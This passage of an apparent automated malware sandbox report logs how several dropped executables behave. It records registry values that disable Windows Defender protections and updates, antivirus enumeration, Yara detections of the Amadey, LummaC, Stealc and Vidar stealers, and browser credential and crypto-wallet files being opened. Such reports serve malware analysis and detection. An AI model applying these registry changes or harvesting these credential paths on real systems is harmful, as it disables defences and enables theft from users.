Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 4_2_0046CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

4_2_0046CBEA

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: qFqSpAp.exe, 0000000E.00000003.2133682441.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2138371141.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168044854.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168475565.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2171828060.0000000003F3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: nder\MsMpeng.exe
Source: Ta3ZyUR.exe, 00000009.00000002.2788978267.000000000145C000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168567245.0000000001B38000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2170484889.0000000001B38000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2133837428.0000000001B38000.00000004.00000020.00020000.00000000.sdmp, jROrnzx.exe, 00000012.00000002.2329211901.0000000001172000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: qFqSpAp.exe, 0000000E.00000003.2133682441.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2138371141.0000000003F31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.hHtR1O06GH.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.skotes.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2776117739.0000000000451000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1527475579.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Ta3ZyUR.exe PID: 6988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qFqSpAp.exe PID: 2028, type: MEMORYSTR
Source: Yara match	File source: 9.2.Ta3ZyUR.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.qFqSpAp.exe.1bb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.jROrnzx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Ta3ZyUR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jROrnzx.exe.3c09550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.jROrnzx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Ta3ZyUR.exe.3e19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2193761654.0000000003C09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2323901817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2170321304.0000000001AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2775687019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\DTQCxXZ[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000000F.00000002.2158683213.000000000189E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2109898501.0000000005470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2150295559.0000000000E21000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m5UP2Yj.exe PID: 5756, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7aencsM.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7aencsM.exe PID: 3668, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Ta3ZyUR.exe, 00000009.00000002.2786807600.000000000140C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Ta3ZyUR.exe, 00000009.00000002.2786807600.000000000140C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Ta3ZyUR.exe, 00000009.00000002.2780603345.00000000013D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: DoinX/Q2AQw/qyEkKrOzl5zLsCbdVn9EvGpRwAFhISc0uYt9kRQ7PROJRQYQkf/wrozTZ+t9BSjFIGHVVUwybGHe7G28WktQEOwWHHqG8M7ZpsRWqgIaGJNeetF1W3owecyQaLtuSD5szhlVafjbwu6S1XOzbh0yyzYl0GpgBmQ85uURw2ouZVafb0xE8vzh7/7TT4ccSD3TI3v9cHM9MF3u3yqoGUUnbsZjbljS16+vvZttlBQ2fNoNPvBbMhJqRebWGKBBdU5u3EhzaIf73fL+21GcBSwKxC1dzEhiA2RC7fYJuEV4O3LaTxNs1sHQxp7papkfDwDQIFLufyg+THnM7G2aZU9QEJxITFrfhP//hMZV6DUWHvZdc9ZqdhNyfvmSHJpOdCd7gHBJaPfB9v+Og1D2HTMsji1p+hVyL2l3wswxgn1mZVD9bhZigvnLs4yHHqtjPB7XB37LVFMwWSG8yDCwb1t7e9kWa3L63dT588FlkT4qNuUPX9UbZTtyeOPDOKdUM2J95hZ4Bdrao9Kn3meSJAxx3wNQ8RR+JUx/zvQrnANSakfefQtumOLj1rnCR75iTDKXIUbcEUA2RDij3TONfGpiSeBGTUXl+KXUp/p68hFIfOxfSeJiaiF1P/LCA9sCbnl78ntTbsGE2MSC3XW4bg4H9wJfyXpiAGs26tEoqBlqRlj4QBZE8f2gwOTZT+kYFyr9JXzIFmQ8X0S/3jC9R0dfS+1ZTUzL2cuzj5t3sBQ1Nt0JT4hVLB5JabrgPLUAKnZT0mtPRMX48PWk5m3tfS0V0wRag3MyFnRb6dMvg2JOUBCfTlFi6ung2LnCaYUfEhfZUnv4aG8Ad1ft8jHMbHd7Y4RIbmX8i/nbqPx68gpQLdsjQNNNRhprfb3ENq5kNnVQ4gpiecfbos+tyFOBeTtv7QdI8VFmMUA9/vtwv3dGYlHpZg8Byd/uzqDeUJYxFyvqITjzTU0JKkm/kSnBdVhJUt9RU37W77iopMVihAwIEM5dRdVoYTJNf+rTDKZjc0Na/k8cSMbEy7Og+kGOYE0q/idG5wxuPDFA4Mkeu0ByOVzCe24dysDe7Y3nSrVjLCLEH1aUZywEaEzC1T6XczJ6FOBtQxj00Naq4MpKpBwUKsohbdJMUR43RuTtA9txNjRvnmJ9b97H5+uf1XryYhAx+DNQzGd1YkpWwcoMkQ5wT3TDdFZz1ub5pKnGUYF5FA7bOWuJTUUbMlKnzjbAeGlifuRXVx/Q2s3W/MlJlCc5F8gCP+hFfyBZIcyMDpl0S35eyGQXXJj42/v590WcYFQ+0BNA0E1xHmJn5/EUxn5tRmOEZhMS44bUxY7dUq0hKyHgRT7UVkMMX3nM1Wi7bkhh
Source: Ta3ZyUR.exe, 00000009.00000002.2786807600.000000000140C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: qFqSpAp.exe, 0000000E.00000003.2122030581.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Ta3ZyUR.exe, 00000009.00000002.2786807600.000000000140C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: Ta3ZyUR.exe, 00000009.00000002.2786807600.000000000140C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: qFqSpAp.exe, 0000000E.00000003.2122005240.0000000001BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: qFqSpAp.exe, 0000000E.00000003.2122005240.0000000001BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
